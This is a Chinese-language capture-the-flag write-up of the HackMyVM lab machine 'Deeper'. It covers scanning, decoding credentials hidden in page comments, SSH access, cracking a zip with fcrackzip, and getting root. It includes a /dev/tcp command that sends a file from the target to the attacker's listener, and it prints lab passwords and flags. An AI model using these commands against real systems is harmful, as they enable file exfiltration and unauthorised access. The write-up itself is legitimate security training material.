文章

Deeper

发表于
作者 4 分钟阅读

Deeper

image-20240414151141950

image-20240414151037636

信息搜集

端口扫描

1

rustscan -a 172.20.10.3 -- -A

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

Open 172.20.10.3:22
Open 172.20.10.3:80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 37:d1:6f:b5:a4:96:e8:78:18:c7:77:d0:3e:20:4e:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0G2tWy4w/Qxs8qOXl67kW082JT6kvWM9CaV4Ycd5xfbh2YW6SbvGD7LUGAq+dlr4hMsmqlb3qa5OxGXxqfEjU=
|   256 cf:5d:90:f3:37:3f:a4:e2:ba:d5:d7:25:c6:4a:a0:61 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMznQqkhSVgCjaHlx4JkgMQc2Ecl+JjVdL7tTAgj9Fyy
80/tcp open  http    syn-ack Apache httpd 2.4.57 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Deeper
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

1

gobuster dir -u http://172.20.10.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.20.10.3
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,zip,git,jpg,txt,png
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 308] [--> http://172.20.10.3/img/]
/server-status        (Status: 403) [Size: 276]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================

漏洞扫描

1

nikto -h http://172.20.10.3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          172.20.10.3
+ Target Hostname:    172.20.10.3
+ Target Port:        80
+ Start Time:         2024-04-14 03:14:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.57 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29a, size: 603c54eaf4155, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-04-14 03:14:52 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

漏洞发现

踩点

image-20240414151733834

image-20240414151806903

image-20240414151823892

查看一下源代码:

1
2
3
4

view-source:http://172.20.10.3/
.......
<!-- GO "deeper" -->
.......

1
2
3
4
5
6

view-source:http://172.20.10.3/deeper/
.......
You have to go deeper
.......
<!-- GO evendeeper -->
.......

1
2
3
4
5
6
7

view-source:http://172.20.10.3/deeper/evendeeper/
.......
Now start digging
.......
.......                        <!-- USER .- .-.. .. -.-. . -->
.......
<!-- PASS 53586470624778486230526c5a58426c63673d3d -->

image-20240414152643403

image-20240414152800304

alice
IwillGoDeeper

尝试ssh连接

image-20240414153336678

成功!

提权

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

alice@deeper:~$ ls
user.txt
alice@deeper:~$ ls -la
total 32
drwxr--r-- 3 alice alice 4096 Aug 26  2023 .
drwxr-xr-x 4 root  root  4096 Aug 25  2023 ..
lrwxrwxrwx 1 alice alice    9 Aug 25  2023 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 Aug 25  2023 .bash_logout
-rw-r--r-- 1 alice alice 3526 Aug 25  2023 .bashrc
-rw-r--r-- 1 alice alice   41 Aug 25  2023 .bob.txt
drwxr-xr-x 3 alice alice 4096 Aug 26  2023 .local
-rw-r--r-- 1 alice alice  807 Aug 25  2023 .profile
-rw-r--r-- 1 alice alice   33 Aug 26  2023 user.txt
alice@deeper:~$ cat user.txt 
7e267b737cc121c29b496dc3bcffa5a7
alice@deeper:~$ cat .bob.txt 
535746745247566c634556756233566e61413d3d
alice@deeper:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
bob:x:1001:1001:bob,,,:/home/bob:/bin/bash

image-20240414153505912

切换用户

bob
IamDeepEnough

发现目录下存在一个压缩包,但是本机没有unzip工具,传到本机来进行解压:

1
2
3
4

# kali
nc -lp 8888 > root.zip
# bob
cat root.zip > /dev/tcp/172.20.10.8/8888

解压一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

┌──(kali💀kali)-[~/temp/deeper]
└─$ ls
root.zip

┌──(kali💀kali)-[~/temp/deeper]
└─$ unzip root.zip   
Archive:  root.zip
[root.zip] root.txt password:

┌──(kali💀kali)-[~/temp/deeper]
└─$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt root.zip

PASSWORD FOUND!!!!: pw == bob

┌──(kali💀kali)-[~/temp/deeper]
└─$ unzip root.zip
Archive:  root.zip
[root.zip] root.txt password: 
 extracting: root.txt                

┌──(kali💀kali)-[~/temp/deeper]
└─$ cat root.txt                                           
root:IhateMyPassword

切换root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

bob@deeper:~$ su -l root
Password: 
root@deeper:~# pwd
/root
root@deeper:~# ls -la
total 32
drwx------  4 root root 4096 Aug 26  2023 .
drwxr-xr-x 18 root root 4096 Aug 25  2023 ..
lrwxrwxrwx  1 root root    9 Aug 25  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
-rw-------  1 root root   20 Aug 25  2023 .lesshst
drwxr-xr-x  3 root root 4096 Aug 25  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   33 Aug 26  2023 root.txt
drwx------  2 root root 4096 Aug 25  2023 .ssh
root@deeper:~# cat root.txt 
dbc56c8328ee4d00bbdb658a8fc3e895

至此,结束!

Training platform, Hackmyvm
Hackmyvm web
本文由作者按照 CC BY 4.0 进行授权